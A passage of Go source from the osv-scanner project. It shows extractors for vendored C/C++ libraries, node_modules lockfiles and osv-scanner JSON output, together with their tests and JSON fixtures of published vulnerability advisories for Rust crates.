determines whether a vendored library with a git directory is scanned or not, // this is used to avoid duplicate results, once from git scanning, once from vendoredDir scanning ScanGitDir bool OSVClient *osvdev.OSVClient } type Extractor struct { // ScanGitDir determines whether a vendored library with a git directory is scanned or not, // this is used to avoid duplicate results, once from git scanning, once from vendoredDir scanning ScanGitDir bool OSVClient *osvdev.OSVClient } // New returns a new instance of the extractor. func New(_ *cpb.PluginConfig) (filesystem.Extractor, error) { return &Extractor{}, nil } // Name of the extractor. func (e *Extractor) Name() string { return Name } // Version of the extractor. func (e *Extractor) Version() int { return 0 } // Requirements of the extractor. func (e *Extractor) Requirements() *plugin.Capabilities { return &plugin.Capabilities{ ExtractFromDirs: true, } } // FileRequired returns true for likely directories to contain vendored c/c++ code func (e *Extractor) FileRequired(fapi filesystem.FileAPI) bool { // Check if parent directory is one of the vendoredLibName // Clean first before Dir call to avoid trailing slashes causing problems parentDir := filepath.Base(filepath.Dir(filepath.Clean(fapi.Path()))) _, ok := vendoredLibNames[parentDir] if !ok { return false } // Stat costs performance, so perform it after the name check stat, err := fapi.Stat() if err != nil { return false } return stat.IsDir() } // Extract determines the most likely package version from the directory and returns them as // commit hash inventory entries func (e *Extractor) Extract(ctx context.Context, input *filesystem.ScanInput) (inventory.Inventory, error) { var packages []*extractor.Package results, err := e.queryDetermineVersions(ctx, input.Path, input.FS, e.ScanGitDir) if err != nil { return inventory.Inventory{}, err } if len(results.GetMatches()) > 0 && results.GetMatches()[0].GetScore() > determineVersionThreshold { match := results.GetMatches()[0] // r.Infof("Identified %s as %s at %s.\n", libPath, match.RepoInfo.Address, match.RepoInfo.Commit) packages = append(packages, &extractor.Package{ SourceCode: &extractor.SourceCodeIdentifier{ Commit: match.GetRepoInfo().GetCommit(), }, Location: extractor.LocationFromPath(input.Path), }) } return inventory.Inventory{ Packages: packages, }, nil } // ToPURL converts an inventory created by this extractor into a PURL. func (e *Extractor) ToPURL(_ *extractor.Package) *purl.PackageURL { return nil } // Ecosystem returns an empty string as all inventories are commit hashes func (e *Extractor) Ecosystem(_ *extractor.Package) string { return "" } func (e *Extractor) queryDetermineVersions(ctx context.Context, repoDir string, fsys scalibrfs.FS, scanGitDir bool) (*api.VersionMatchList, error) { var hashes []*api.FileHash err := fs.WalkDir(fsys, repoDir, func(p string, d fs.DirEntry, _ error) error { if d.IsDir() { if !scanGitDir { if _, err := fsys.Stat(filepath.Join(p, ".git")); err == nil { // Found a git repo, stop here as otherwise we may get duplicated // results with our regular git commit scanning. return filepath.SkipDir } } if _, ok := vendoredLibNames[strings.ToLower(d.Name())]; ok { // Ignore nested vendored libraries, as they can cause bad matches. return filepath.SkipDir } return nil } if !slices.Contains(fileExts, filepath.Ext(p)) { return nil } file, err := fsys.Open(p) if err != nil { return err } buf := bytes.NewBuffer(nil) _, err = io.Copy(buf, file) if err != nil { return err } hash := md5.Sum(buf.Bytes()) //nolint:gosec hashes = append(hashes, &api.FileHash{ FilePath: strings.ReplaceAll(p, repoDir, ""), Hash: hash[:], }) if len(hashes) > maxDetermineVersionFiles { return errors.New("too many files to hash") } return nil }) if err != nil { return nil, fmt.Errorf("failed during hashing: %w", err) } result, err := e.OSVClient.ExperimentalDetermineVersion(ctx, &api.DetermineVersionParameters{ Query: &api.VersionQuery{ Name: filepath.Base(repoDir), FileHashes: hashes, }, }) if err != nil { return nil, fmt.Errorf("failed to determine versions: %w", err) } return result, nil } var _ filesystem.Extractor = &Extractor{} type configurable interface { Configure(config Config) } func (e *Extractor) Configure(config Config) { e.ScanGitDir = config.ScanGitDir e.OSVClient = config.OSVClient } var _ configurable = &Extractor{} func Configure(plug plugin.Plugin, config Config) { us, ok := plug.(configurable) if ok { us.Configure(config) } } ================================================ FILE: internal/scalibrextract/filesystem/vendored/vendored_test.go ================================================ package vendored_test import ( "io/fs" "path/filepath" "runtime" "testing" "github.com/google/go-cmp/cmp" "github.com/google/go-cmp/cmp/cmpopts" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem/simplefileapi" "github.com/google/osv-scalibr/testing/extracttest" "github.com/google/osv-scalibr/testing/fakefs" "github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored" "github.com/google/osv-scanner/v2/internal/testutility" "osv.dev/bindings/go/osvdev" ) func TestExtractor_FileRequired(t *testing.T) { t.Parallel() tests := []struct { name string path string isDir bool wantRequired bool }{ { name: "Empty_path", path: filepath.FromSlash(""), isDir: false, wantRequired: false, }, { name: "single_directory_not_under_vendor_dir", path: filepath.FromSlash("test_dir/"), isDir: true, wantRequired: false, }, { name: "vendored_dir_itself_should_not_match", path: filepath.FromSlash("vendor/"), isDir: true, wantRequired: false, }, { name: "vendored_dir_itself_should_not_match_(no_trailing_slash)", path: filepath.FromSlash("vendor"), isDir: true, wantRequired: false, }, { name: "vendored_dir_with_child_non_directory_should_not_match", path: filepath.FromSlash("vendor/abcd"), isDir: false, wantRequired: false, }, { name: "vendored_dir_with_child_directory_should_match", path: filepath.FromSlash("vendor/abcd/"), isDir: true, wantRequired: true, }, { name: "vendored_dir_with_child_directory_should_match", path: filepath.FromSlash("thirdparty/efgh/"), isDir: true, wantRequired: true, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() extr := vendored.Extractor{} permission := fs.ModePerm if tt.isDir { permission = fs.ModePerm | fs.ModeDir } isRequired := extr.FileRequired(simplefileapi.New(tt.path, fakefs.FakeFileInfo{ FileName: filepath.Base(tt.path), FileMode: permission, FileSize: 1000, })) if isRequired != tt.wantRequired { t.Fatalf("FileRequired(%s): got %v, want %v", tt.path, isRequired, tt.wantRequired) } }) } } func TestExtractor_Extract(t *testing.T) { t.Parallel() if runtime.GOOS == "windows" { // TODO: Reenable when #657 is resolved. testutility.Skip(t, "Temporarily disabled until #657 is resolved") } cwd := testutility.GetCurrentWorkingDirectory(t) tests := []extracttest.TestTableEntry{ { Name: "zlib_test", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/thirdparty/zlib", FakeScanRoot: cwd, }, WantPackages: []*extractor.Package{ { SourceCode: &extractor.SourceCodeIdentifier{ Commit: "09155eaa2f9270dc4ed1fa13e2b4b2613e6e4851", }, Location: extractor.LocationFromPath("testdata/thirdparty/zlib"), }, }, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() extr := vendored.Extractor{ OSVClient: osvdev.DefaultClient(), } scanInput := extracttest.GenerateScanInputMock(t, tt.InputConfig) defer extracttest.CloseTestScanInput(t, scanInput) got, err := extr.Extract(t.Context(), &scanInput) if diff := cmp.Diff(tt.WantErr, err, cmpopts.EquateErrors()); diff != "" { t.Errorf("%s.Extract(%q) error diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) return } if diff := cmp.Diff(tt.WantPackages, got.Packages, cmpopts.SortSlices(extracttest.PackageCmpLess)); diff != "" { t.Errorf("%s.Extract(%q) diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) } }) } } ================================================ FILE: internal/scalibrextract/language/javascript/nodemodules/extractor.go ================================================ // Package nodemodules provides an extractor for node_modules directories by reading the .package-lock.json file. package nodemodules import ( "context" "path/filepath" cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto" "github.com/google/osv-scalibr/extractor/filesystem" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/plugin" ) const ( // Name is the unique name of this extractor. Name = "javascript/nodemodules" ) type Extractor struct { actualExtractor packagelockjson.Extractor } // New returns a new instance of the extractor. func New(_ *cpb.PluginConfig) (filesystem.Extractor, error) { return &Extractor{}, nil } // Name of the extractor. func (e Extractor) Name() string { return Name } // Version of the extractor. func (e Extractor) Version() int { return 0 } // Requirements of the extractor. func (e Extractor) Requirements() *plugin.Capabilities { return &plugin.Capabilities{} } // FileRequired returns true for .package-lock.json files under node_modules func (e Extractor) FileRequired(fapi filesystem.FileAPI) bool { return filepath.Base(filepath.Dir(fapi.Path())) == "node_modules" && filepath.Base(fapi.Path()) == ".package-lock.json" } // Extract extracts packages from yarn.lock files passed through the scan input. func (e Extractor) Extract(ctx context.Context, input *filesystem.ScanInput) (inventory.Inventory, error) { return e.actualExtractor.Extract(ctx, input) } var _ filesystem.Extractor = Extractor{} ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/extractor.go ================================================ // Package osvscannerjson extracts osv-scanner's json output. package osvscannerjson import ( "context" "encoding/json" "fmt" "path/filepath" cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/plugin" "github.com/google/osv-scanner/v2/pkg/models" ) const ( // Name is the unique name of this extractor. Name = "osv/osvscannerjson" ) // Extractor extracts osv packages from osv-scanner json output. type Extractor struct{} // Name of the extractor. func (e Extractor) Name() string { return Name } // Version of the extractor. func (e Extractor) Version() int { return 0 } // Requirements of the extractor. func (e Extractor) Requirements() *plugin.Capabilities { return &plugin.Capabilities{} } func New(_ *cpb.PluginConfig) (filesystem.Extractor, error) { return Extractor{}, nil } // FileRequired returns true only for osv-scanner-custom.json files, // since this is specific to the osv-scanner JSON output func (e Extractor) FileRequired(fapi filesystem.FileAPI) bool { return filepath.Base(fapi.Path()) == "osv-scanner-custom.json" } // Extract extracts packages from yarn.lock files passed through the scan input. func (e Extractor) Extract(_ context.Context, input *filesystem.ScanInput) (inventory.Inventory, error) { parsedResults := models.VulnerabilityResults{} err := json.NewDecoder(input.Reader).Decode(&parsedResults) if err != nil { return inventory.Inventory{}, fmt.Errorf("could not extract from %s: %w", input.Path, err) } packages := []*extractor.Package{} for _, res := range parsedResults.Results { for _, pkg := range res.Packages { inv := extractor.Package{ Name: pkg.Package.Name, Version: pkg.Package.Version, Metadata: &Metadata{ Ecosystem: pkg.Package.Ecosystem, SourceInfo: res.Source, }, PURLType: "placeholder", Location: extractor.LocationFromPath(input.Path), Plugins: []string{"osv/osvscannerjson"}, } if pkg.Package.Commit != "" { inv.SourceCode = &extractor.SourceCodeIdentifier{ Commit: pkg.Package.Commit, } } packages = append(packages, &inv) } } return inventory.Inventory{ Packages: packages, }, nil } var _ filesystem.Extractor = Extractor{} ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/extractor_test.go ================================================ package osvscannerjson_test import ( "testing" "github.com/google/go-cmp/cmp" "github.com/google/go-cmp/cmp/cmpopts" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/testing/extracttest" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson" "github.com/google/osv-scanner/v2/pkg/models" ) func TestExtractor_Extract(t *testing.T) { t.Parallel() tests := []extracttest.TestTableEntry{ { Name: "invalid_yaml", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/not-json.txt", }, WantErr: extracttest.ContainsErrStr{Str: "could not extract from"}, }, { Name: "empty", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/empty.json", }, WantPackages: []*extractor.Package{}, }, { Name: "one_package", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/one-package.json", }, WantPackages: []*extractor.Package{ { Name: "activesupport", Version: "7.0.7", Location: extractor.LocationFromPath("testdata/one-package.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, Metadata: &osvscannerjson.Metadata{ Ecosystem: "RubyGems", SourceInfo: models.SourceInfo{ Path: "/path/to/Gemfile.lock", Type: "lockfile", }, }, }, }, }, { Name: "one_package_with_commit", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/one-package-commit.json", }, WantPackages: []*extractor.Package{ { Location: extractor.LocationFromPath("testdata/one-package-commit.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, SourceCode: &extractor.SourceCodeIdentifier{ Commit: "9a6bd55c9d0722cb101fe85a3b22d89e4ff4fe52", }, Metadata: &osvscannerjson.Metadata{ SourceInfo: models.SourceInfo{ Path: "/path/to/Gemfile.lock", Type: "lockfile", }, }, }, }, }, { Name: "multiple_packages", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/multiple-packages-with-vulns.json", }, WantPackages: []*extractor.Package{ { Name: "crossbeam-utils", Version: "0.6.6", Location: extractor.LocationFromPath("testdata/multiple-packages-with-vulns.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, Metadata: &osvscannerjson.Metadata{ Ecosystem: "crates.io", SourceInfo: models.SourceInfo{ Path: "/path/to/Cargo.lock", Type: "lockfile", }, }, }, { Name: "memoffset", Version: "0.5.6", Location: extractor.LocationFromPath("testdata/multiple-packages-with-vulns.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, Metadata: &osvscannerjson.Metadata{ Ecosystem: "crates.io", SourceInfo: models.SourceInfo{ Path: "/path/to/Cargo.lock", Type: "lockfile", }, }, }, { Name: "smallvec", Version: "1.6.0", Location: extractor.LocationFromPath("testdata/multiple-packages-with-vulns.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, Metadata: &osvscannerjson.Metadata{ Ecosystem: "crates.io", SourceInfo: models.SourceInfo{ Path: "/path/to/Cargo.lock", Type: "lockfile", }, }, }, }, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() extr := osvscannerjson.Extractor{} scanInput := extracttest.GenerateScanInputMock(t, tt.InputConfig) defer extracttest.CloseTestScanInput(t, scanInput) got, err := extr.Extract(t.Context(), &scanInput) if diff := cmp.Diff(tt.WantErr, err, cmpopts.EquateErrors()); diff != "" { t.Errorf("%s.Extract(%q) error diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) return } if diff := cmp.Diff(tt.WantPackages, got.Packages, cmpopts.SortSlices(extracttest.PackageCmpLess)); diff != "" { t.Errorf("%s.Extract(%q) diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) } }) } } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/metadata.go ================================================ package osvscannerjson import "github.com/google/osv-scanner/v2/pkg/models" // Metadata holds the metadata for osvscanner.json type Metadata struct { Ecosystem string SourceInfo models.SourceInfo } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/empty.json ================================================ { "results": [] } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/multiple-packages-with-vulns.json ================================================ { "results": [ { "source": { "path": "/path/to/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "crossbeam-utils", "version": "0.6.6", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2022-08-11T21:55:33Z", "published": "2022-02-16T22:36:21Z", "schema_version": "1.4.0", "id": "GHSA-qc84-gqf4-9926", "aliases": [ "CVE-2022-23639" ], "summary": "crossbeam-utils Race Condition vulnerability", "details": "### Impact\n\nThe affected version of this crate incorrectly assumed that the alignment of `{i,u}64` was always the same as `Atomic{I,U}64`. \n\nHowever, the alignment of `{i,u}64` on a 32-bit target can be smaller than `Atomic{I,U}64`.\n\nThis can cause the following problems:\n\n- Unaligned memory accesses\n- Data race\n\nCrates using `fetch_*` methods with `AtomicCell\u003c{i,u}64\u003e` are affected by this issue.\n\n32-bit targets without `Atomic{I,U}64` and 64-bit targets are not affected by this issue.\n32-bit targets with `Atomic{I,U}64` and `{i,u}64` have the same alignment are also not affected by this issue.\n\nThe following is a complete list of the builtin targets that may be affected. (last update: nightly-2022-02-11)\n\n- armv7-apple-ios (tier 3)\n- armv7s-apple-ios (tier 3)\n- i386-apple-ios (tier 3)\n- i586-unknown-linux-gnu\n- i586-unknown-linux-musl\n- i686-apple-darwin (tier 3)\n- i686-linux-android\n- i686-unknown-freebsd\n- i686-unknown-haiku (tier 3)\n- i686-unknown-linux-gnu\n- i686-unknown-linux-musl\n- i686-unknown-netbsd (tier 3)\n- i686-unknown-openbsd (tier 3)\n- i686-wrs-vxworks (tier 3)\n\n([script to get list](https://gist.github.com/taiki-e/3c7891e8c5f5e0cbcb44d7396aabfe10))\n\n### Patches\n\nThis has been fixed in crossbeam-utils 0.8.7.\n\nAffected 0.8.x releases have been yanked.\n\n### References\n\nhttps://github.com/crossbeam-rs/crossbeam/pull/781 \n\n### License\n\nThis advisory is in the public domain.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "crossbeam-utils", "purl": "pkg:cargo/crossbeam-utils" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-qc84-gqf4-9926/GHSA-qc84-gqf4-9926.json" } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "references": [ { "type": "WEB", "url": "https://github.com/crossbeam-rs/crossbeam/security/advisories/GHSA-qc84-gqf4-9926" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23639" }, { "type": "WEB", "url": "https://github.com/crossbeam-rs/crossbeam/pull/781" }, { "type": "PACKAGE", "url": "https://github.com/crossbeam-rs/crossbeam" }, { "type": "WEB", "url": "https://github.com/crossbeam-rs/crossbeam/releases/tag/crossbeam-utils-0.8.7" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0041.html" } ], "database_specific": { "cwe_ids": [ "CWE-362" ], "github_reviewed": true, "github_reviewed_at": "2022-02-16T22:36:21Z", "nvd_published_at": "2022-02-15T19:15:00Z", "severity": "HIGH" } }, { "modified": "2022-08-04T13:56:30Z", "published": "2022-02-05T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2022-0041", "aliases": [ "GHSA-qc84-gqf4-9926", "CVE-2022-23639" ], "summary": "Unsoundness of AtomicCell\u003c*64\u003e arithmetics on 32-bit targets that support Atomic*64", "details": "## Impact\n\nAffected versions of this crate incorrectly assumed that the alignment of {i,u}64 was always the same as Atomic{I,U}64.\n\nHowever, the alignment of {i,u}64 on a 32-bit target can be smaller than Atomic{I,U}64.\n\nThis can cause the following problems:\n\n- Unaligned memory accesses\n- Data race\n\nCrates using fetch_* methods with AtomicCell\u003c{i,u}64\u003e are affected by this issue.\n\n32-bit targets without Atomic{I,U}64 and 64-bit targets are not affected by this issue.\n\n32-bit targets with Atomic{I,U}64 and {i,u}64 have the same alignment are also not affected by this issue.\n\nThe following is a complete list of the builtin targets that may be affected. (last update: nightly-2022-02-11)\n\n- armv7-apple-ios (tier 3)\n- armv7s-apple-ios (tier 3)\n- i386-apple-ios (tier 3)\n- i586-unknown-linux-gnu\n- i586-unknown-linux-musl\n- i686-apple-darwin (tier 3)\n- i686-linux-android\n- i686-unknown-freebsd\n- i686-unknown-haiku (tier 3)\n- i686-unknown-linux-gnu\n- i686-unknown-linux-musl\n- i686-unknown-netbsd (tier 3)\n- i686-unknown-openbsd (tier 3)\n- i686-wrs-vxworks (tier 3)\n\n([script to get list](https://gist.github.com/taiki-e/3c7891e8c5f5e0cbcb44d7396aabfe10))\n\n## Patches\n\nThis has been fixed in crossbeam-utils 0.8.7.\n\nAffected 0.8.x releases have been yanked.\n\nThanks to @taiki-e", "affected": [ { "package": { "ecosystem": "crates.io", "name": "crossbeam-utils", "purl": "pkg:cargo/crossbeam-utils" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.7" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2022-0041.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/crossbeam-utils" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0041.html" }, { "type": "WEB", "url": "https://github.com/crossbeam-rs/crossbeam/pull/781" } ] } ], "groups": [ { "ids": [ "GHSA-qc84-gqf4-9926", "RUSTSEC-2022-0041" ] } ] }, { "package": { "name": "memoffset", "version": "0.5.6", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-06-21T22:06:29Z", "published": "2023-06-21T22:06:29Z", "schema_version": "1.4.0", "id": "GHSA-wfg4-322g-9vqv", "summary": "memoffset allows reading uninitialized memory", "details": "memoffset allows attempt of reading data from address `0` with arbitrary type. This behavior is an undefined behavior because address `0` to `std::mem::size_of\u003cT\u003e` may not have valid bit-pattern with `T`. Old implementation dereferences uninitialized memory obtained from `std::mem::align_of`. Older implementation prior to it allows using uninitialized data obtained from `std::mem::uninitialized` with arbitrary type then compute offset by taking the address of field-projection. This may also result in an undefined behavior for \"father\" that includes (directly or transitively) type that [does not allow to be uninitialized](https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html).\n\nThis flaw was corrected by using `std::ptr::addr_of` in \u003chttps://github.com/Gilnaa/memoffset/pull/50\u003e.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "memoffset", "purl": "pkg:cargo/memoffset" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.6.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-wfg4-322g-9vqv/GHSA-wfg4-322g-9vqv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/Gilnaa/memoffset/issues/24" }, { "type": "WEB", "url": "https://github.com/Gilnaa/memoffset/pull/50" }, { "type": "PACKAGE", "url": "https://github.com/Gilnaa/memoffset" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0045.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-06-21T22:06:29Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "modified": "2023-07-08T12:30:19Z", "published": "2023-06-21T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2023-0045", "aliases": [ "GHSA-wfg4-322g-9vqv" ], "summary": "memoffset allows reading uninitialized memory", "details": "memoffset allows attempt of reading data from address `0` with arbitrary type. This behavior is an undefined behavior because address `0` to `std::mem::size_of\u003cT\u003e` may not have valid bit-pattern with `T`. Old implementation dereferences uninitialized memory obtained from `std::mem::align_of`. Older implementation prior to it allows using uninitialized data obtained from `std::mem::uninitialized` with arbitrary type then compute offset by taking the address of field-projection. This may also result in an undefined behavior for \"father\" that includes (directly or transitively) type that [does not allow to be uninitialized](https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html).\n\nThis flaw was corrected by using `std::ptr::addr_of` in \u003chttps://github.com/Gilnaa/memoffset/pull/50\u003e.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "memoffset", "purl": "pkg:cargo/memoffset" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.6.2" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0045.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "memoffset::offset_of" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/memoffset" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0045.html" }, { "type": "REPORT", "url": "https://github.com/Gilnaa/memoffset/issues/24" } ] } ], "groups": [ { "ids": [ "GHSA-wfg4-322g-9vqv", "RUSTSEC-2023-0045" ] } ] }, { "package": { "name": "smallvec", "version": "1.6.0", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-06-13T20:51:42Z", "published": "2022-05-24T17:40:21Z", "schema_version": "1.4.0", "id": "GHSA-43w2-9j62-hq99", "aliases": [ "CVE-2021-25900" ], "summary": "Buffer overflow in SmallVec::insert_many", "details": "A bug in the SmallVec::insert_many method caused it to allocate a buffer that was smaller than needed. It then wrote past the end of the buffer, causing a buffer overflow and memory corruption on the heap. This bug was only triggered if the iterator passed to insert_many yielded more items than the lower bound returned from its size_hint method.\n\nThe flaw was corrected in smallvec 0.6.14 and 1.6.1, by ensuring that additional space is always reserved for each item inserted. The fix also simplified the implementation of insert_many to use less unsafe code, so it is easier to verify its correctness.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "smallvec", "purl": "pkg:cargo/smallvec" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.3" }, { "fixed": "0.6.14" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-43w2-9j62-hq99/GHSA-43w2-9j62-hq99.json" }, "ecosystem_specific": { "affected_functions": [ "smallvec::SmallVec::insert_many" ] } }, { "package": { "ecosystem": "crates.io", "name": "smallvec", "purl": "pkg:cargo/smallvec" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.6.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-43w2-9j62-hq99/GHSA-43w2-9j62-hq99.json" }, "ecosystem_specific": { "affected_functions": [ "smallvec::SmallVec::insert_many" ] } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25900" }, { "type": "WEB", "url": "https://github.com/servo/rust-smallvec/issues/252" }, { "type": "PACKAGE", "url": "https://github.com/servo/rust-smallvec" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2021-0003.html" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-06-17T00:20:48Z", "nvd_published_at": "2021-01-26T18:16:00Z", "severity": "CRITICAL" } }, { "modified": "2023-06-13T13:10:24Z", "published": "2021-01-08T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2021-0003", "aliases": [ "CVE-2021-25900", "GHSA-43w2-9j62-hq99" ], "summary": "Buffer overflow in SmallVec::insert_many", "details": "A bug in the `SmallVec::insert_many` method caused it to allocate a buffer that was smaller than needed. It then wrote past the end of the buffer, causing a buffer overflow and memory corruption on the heap.\n\nThis bug was only triggered if the iterator passed to `insert_many` yielded more items than the lower bound returned from its `size_hint` method.\n \nThe flaw was corrected in smallvec 0.6.14 and 1.6.1, by ensuring that additional space is always reserved for each item inserted. The fix also simplified the implementation of `insert_many` to use less unsafe code, so it is easier to verify its correctness.\n\nThank you to Yechan Bae (@Qwaz) and the Rust group at Georgia Tech’s SSLab for finding and reporting this bug.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "smallvec", "purl": "pkg:cargo/smallvec" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.3" }, { "fixed": "0.6.14" }, { "introduced": "1.0.0" }, { "fixed": "1.6.1" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2021-0003.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "smallvec::SmallVec::insert_many" ], "os": [] } } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/smallvec" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2021-0003.html" }, { "type": "REPORT", "url": "https://github.com/servo/rust-smallvec/issues/252" } ] } ], "groups": [ { "ids": [ "GHSA-43w2-9j62-hq99", "RUSTSEC-2021-0003" ] } ] } ] } ] } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/not-json.txt ================================================ this is not valid json! (I think) ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/one-package-commit.json ================================================ { "results": [ { "source": { "path": "/path/to/Gemfile.lock", "type": "lockfile" }, "packages": [ { "package": { "commit": "9a6bd55c9d0722cb101fe85a3b22d89e4ff4fe52" }, "vulnerabilities": [], "groups": [] } ] } ] } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/one-package.json ================================================ { "results": [ { "source": { "path": "/path/to/Gemfile.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "activesupport", "version": "7.0.7", "ecosystem": "RubyGems" }, "vulnerabilities": [], "groups": [] } ] } ] } ================================================ FILE: internal/scalibrextract/vcs/gitcommitdirect/extractor.go ================================================ // Package gitcommitdirect provides an dummy extractor that returns a preset list of commits package gitcommitdirect import ( "context" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/standalone" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/plugin" ) const ( // Name is the unique name of this extractor. Name = "vcs/gitcommitdirect" ) // Extractor extracts git repository hashes including submodule hashes. // This extractor will not return an error, and will just return no results if we fail to extract type Extractor struct { commits []string } // New returns a new instance of the extractor. func New(commits []string) standalone.Extractor { return &Extractor{ commits: commits, } } // Name of the extractor. func (e *Extractor) Name() string { return Name } // Version of the extractor. func (e *Extractor) Version() int { return 0 } // Requirements of the extractor. func (e *Extractor) Requirements() *plugin.Capabilities { return &plugin.Capabilities{} } func (e *Extractor) Extract(_ context.Context, _ *standalone.ScanInput) (inventory.Inventory, error) { pkgs := make([]*extractor.Package, 0, len(e.commits)) for _, commit := range e.commits { pkgs = append(pkgs, &extractor.Package{ SourceCode: &extractor.SourceCodeIdentifier{Commit: commit}, }) } return 